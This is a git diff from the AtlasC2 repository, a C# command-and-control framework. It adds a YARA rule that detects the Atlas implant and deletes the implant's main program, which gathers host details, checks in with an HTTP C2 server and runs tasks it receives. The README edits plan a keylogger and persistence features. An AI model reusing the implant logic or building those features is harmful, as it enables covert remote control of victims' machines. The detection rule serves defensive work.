diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 0000000..f7a49e8 --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1,4 @@ +# These are supported funding model platforms + +github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] +ko_fi: grimmie diff --git a/AtlasImplant.yar b/AtlasImplant.yar new file mode 100644 index 0000000..3493f7b --- /dev/null +++ b/AtlasImplant.yar @@ -0,0 +1,61 @@ +rule AtlasImplant_Yara { + meta: + last_updated = "3-20-2022" + author = "Grimmie (@Gr1mmie)" + description = "Searches for strings present in the Atlas C2 Implant" + md5 = "7bbb5fce0b18f613674fd09da14e5e45" + + strings: + // system namespaces + $systemNamespace1 = "System.Net" ascii + $systemNamespace2 = "System.Text" ascii + $systemNamespace3 = "System.Linq" ascii + $systemNamespace4 = "System.Timers" ascii + $systemNamespace5 = "System.Runtime" ascii + $systemNamespace6 = "System.Reflection" ascii + $systemNamespace7 = "System.Collections" ascii + $systemNamespace8 = "System.Diagnostics" ascii + $systemNamespace9 = "System.Security" ascii + $systemNamespace10 = "System.Management.Automation" ascii + + // misc stuffs + $misc1 = "ImplantDataUtils" ascii + $misc2 = "ImplantTaskUtils" ascii + $misc3 = "ImplantOptionUtils" ascii + $misc4 = "ImplantCommands" ascii + $misc5 = "ImplantTask" ascii + $misc6 = "ImplantTaskOptions" ascii + $misc7 = "ImplantOptions" ascii + $misc8 = "ImplantCommandsInit" ascii + $misc9 = "ImplantInit" ascii + $misc10 = "PollImplant" ascii + $misc11 = "ImplantTaskOut" ascii + + // comms stuffs + $comms1 = "+Implant.Models.HTTPComms+d__16" ascii + $comms2 = "(Implant.Models.HTTPComms+d__18" ascii + $comms3 = "%Implant.Models.HTTPComms+d__19" ascii + + // getter stuffs + $get1 = "get_assemParams" ascii + $get2 = "get_assemBytes" ascii + $get3 = "get_targetDir" ascii + $get4 = "get_procIDLen" ascii + $get5 = "get_procSessionIDLen" ascii + $get6 = "get_procNameLen" ascii + $get7 = "get_fileNameLen" ascii + $get8 = "get_dirNameLen" ascii + $get9 = "get_fileSizeLen" ascii + $get10 = "get_CurrentDomain" ascii + $get11 = "get_IsCancellationRequested" ascii + $get12 = "get_Command" ascii + $get13 = "get_assemMethod" ascii + + condition: + uint16(0) == 0x5A4D and + all of $systemNamespace* and + all of $misc* and + all of $comms* and + 3 of $get* + +} diff --git a/Implant/TestExe.cs b/Implant/TestExe.cs deleted file mode 100644 index 3d8ba1e..0000000 --- a/Implant/TestExe.cs +++ /dev/null @@ -1,87 +0,0 @@ -using System; -using System.Collections.Generic; -using System.Diagnostics; -using System.Linq; -using System.Reflection; -using System.Threading; - -using Implant.Models; -using Implant.Utils; - -namespace Implant -{ - class Program - { - private static ImplantData _implantData; - private static Comms _comms; - private static CancellationTokenSource _cancelToken; - - private static List _commands = new List(); - - //put into utils - public static void GenImplantData(){ - var proc = Process.GetCurrentProcess(); - - _implantData = new ImplantData { - // get DNS hostname - ID = ImplantDataUtils.GenImplantName(), HostName = Environment.MachineName, - User = Environment.UserName, Integrity = ImplantDataUtils.ReturnIntegrity(), - Arch = ImplantDataUtils.ReturnArch(), - ProcID = proc.Id, ProcName = proc.ProcessName, - IPAddr = ImplantDataUtils.GetHostIP() - }; - - proc.Dispose(); - } - - public static void SendTaskOut(string _id, string _out) { - var taskOut = new ImplantTaskOut { Id = _id, TaskOut = _out }; - _comms.DataSend(taskOut); - } - - public static void HandleTask(ImplantTask task) { - var command = _commands.FirstOrDefault(cmd => cmd.Name.Equals(task.Command, StringComparison.InvariantCultureIgnoreCase)); - if (command is null) { return; } - - var _out = command.Execute(task); - SendTaskOut(task.Id, _out); - } - - public static void HandleTasks(IEnumerable tasks) { - foreach (var task in tasks) { HandleTask(task); } - } - - public static void ImplantCommandsInit() - { - foreach (Type type in Assembly.GetExecutingAssembly().GetTypes()) - { - if (type.IsSubclassOf(typeof(ImplantCommands))) - { - ImplantCommands cmd = Activator.CreateInstance(type) as ImplantCommands; - _commands.Add(cmd); - } - } - } - - public void Stop() { _cancelToken.Cancel(); } - - static void Main(string[] args) { - - Thread.Sleep(10000); - - GenImplantData(); - ImplantCommandsInit(); - - _comms = new HTTPComms("localhost", 8080); - _comms.ImplantInit(_implantData); - _comms.Start(); - - _cancelToken = new CancellationTokenSource(); - - while (!_cancelToken.IsCancellationRequested) { - if (_comms.DataRecv(out var tasks)) { HandleTasks(tasks); } - } - } - - } -} diff --git a/README.md b/README.md index 2033469..0a800c7 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # AtlasC2 C# C2 Framework centered around Stage 1 operations -Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all. +Atlas is based around gaining a foothold within an environment and further utilizing it to smuggle in C# (currently strictly C#) weaponry utilizing an HTTP based implant. Isn't exactly very OPSEC safe in it's current state...at all. Currently targets only windows environments ## Usage @@ -77,7 +77,8 @@ Open .sln and build all 3 components in Release mode * Add admin utils: * `cp` * `upload`/`download` -* Some barebones persistence commands (idk something like creating a user via ADSI) +* Keylogger (probs make standalone to load into implant) +* Some barebones persistence commands (idk something like creating a user via ADSI, WMI subscription creation. probs make these standalone assems to load into implant) * Allow for the changing of the sleep timing on implant and implement jitter * Allow for operator to change port TeamServer starts on via CLI * Encrypted comms (yikes, ik) @@ -90,8 +91,5 @@ Open .sln and build all 3 components in Release mode * Shellcode generation via Donut * BOFs would be cool - -### Note To Self: u forgot YARA rule. dewit - ## Disclaimer Atlas was designed soley for educational/ethical purposes. I do not condone nor am I responsible for actions taken by users of Atlas